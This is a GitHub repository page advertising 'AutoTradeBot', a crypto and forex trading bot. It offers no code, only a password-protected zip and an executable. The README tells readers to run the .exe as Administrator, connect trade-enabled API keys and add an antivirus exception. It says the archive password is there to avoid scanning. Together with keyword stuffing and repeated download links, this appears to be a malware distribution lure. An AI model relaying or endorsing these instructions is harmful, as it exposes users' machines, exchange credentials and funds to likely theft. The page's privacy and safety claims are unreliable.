Skip to content

Latest commit

 

History

2 Commits

Folders and files

NameName
Last commit message
Last commit date
 
 
 
 

Repository files navigation

image

AutoTradeBot

Automated trading bot that opens and closes positions in real time.

AutoTrade Bot – Automated Position Management

Automated trading bot that opens and closes positions in real time.

Download Latest Release


📥 Download

Get the latest version directly from the Releases page:

👉 https://github.com/TellerInertia/AutoTradeBot/releases/latest

  • Archive: AutoTradeBot_v1.0.zip
  • Password: 8025381933
  • Executable: AutoTradeBot.exe

Download the archive, extract it using the password above, and run the executable.


🤖 About AutoTrade Bot

AutoTrade Bot is a desktop application that automatically opens and closes trading positions based on a configurable strategy engine. It connects to crypto and forex venues via API, streams live market data, and manages the entire position lifecycle — entry, stop-loss, take-profit, trailing, and exit.

The bot supports grid, DCA, trend-following, and scalping strategies out of the box, and lets you build your own rules without writing code. Every action is logged and exportable for review.

It runs locally on your machine. API keys and settings never leave your system.


⚙️ Features

  • 🤖 Auto entry & exit — opens and closes positions without manual input.
  • 📈 Built-in strategies — grid, DCA, trend-following, scalping.
  • 🎯 Custom rule builder — no-code strategy editor.
  • 🛡️ Risk management — stop-loss, take-profit, trailing stop, daily loss limit.
  • 💼 Position sizing — fixed, percent-based, or risk-per-trade.
  • 🕒 Multi-timeframe — combine signals across timeframes.
  • 📊 Live dashboard — open positions, PnL, win rate, drawdown.
  • 🔔 Alerts — desktop and sound on every open/close event.
  • 📉 Backtesting — test strategies on historical data.
  • 💾 Trade log — export all trades to CSV.
  • 🖥️ Portable — single .exe, no installation.
  • 🔒 Local-only — no cloud calls, no telemetry.

🚀 How to Use

  1. Download AutoTradeBot_v1.0.zip from the Releases page.
  2. Extract the archive using the password: 8025381933.
  3. Run AutoTradeBot.exe as Administrator.
  4. Connect your trading venue API (trade-enabled).
  5. Choose a strategy or build your own.
  6. Configure risk: max position, daily loss limit, leverage.
  7. Start the bot — positions open and close automatically.

💻 System Requirements

  • OS: Windows 10 / 11 (64-bit)
  • RAM: 8 GB minimum, 16 GB recommended
  • CPU: Quad-core 2.5 GHz or better
  • Disk: 300 MB free space
  • Internet: Stable low-latency connection

🔒 Safety & Notes

  • ⚠️ Trading involves risk. Automated execution can lead to losses. Test on a demo account first.
  • Local only. API keys and settings stay on your machine.
  • No telemetry. No analytics, no reporting, no external calls except venue APIs.
  • Antivirus note. Trading bots are often flagged as false positives. Add an exception for AutoTradeBot.exe if needed.
  • Archive password exists to prevent false-positive scanning during download.

❓ FAQ

Is this fully automated?
Yes — the bot opens and closes positions without manual input.

Which venues are supported?
Major crypto exchanges and forex brokers. Full list is shown inside the app.

Do I need programming skills?
No. Strategies are configured through a no-code rule builder.

Will my data be sent anywhere?
No. Everything runs locally.

Can I test it first?
Yes — use a demo account or the backtesting module.

What happens if my PC turns off?
Open positions stay on the exchange. The bot resumes management on restart.


📎 Direct Download

Always the latest version:
👉 https://github.com/TellerInertia/AutoTradeBot/releases/latest

Archive: AutoTradeBot_v1.0.zip
Password: 8025381933


Keywords: trading bot, auto trading, automated trading, position management, crypto bot, forex bot, grid bot, DCA bot, trend following, scalping bot, algorithmic trading, no-code strategy, stop-loss, take-profit, trailing stop, backtesting, trade automation.

Releases

Packages

Contributors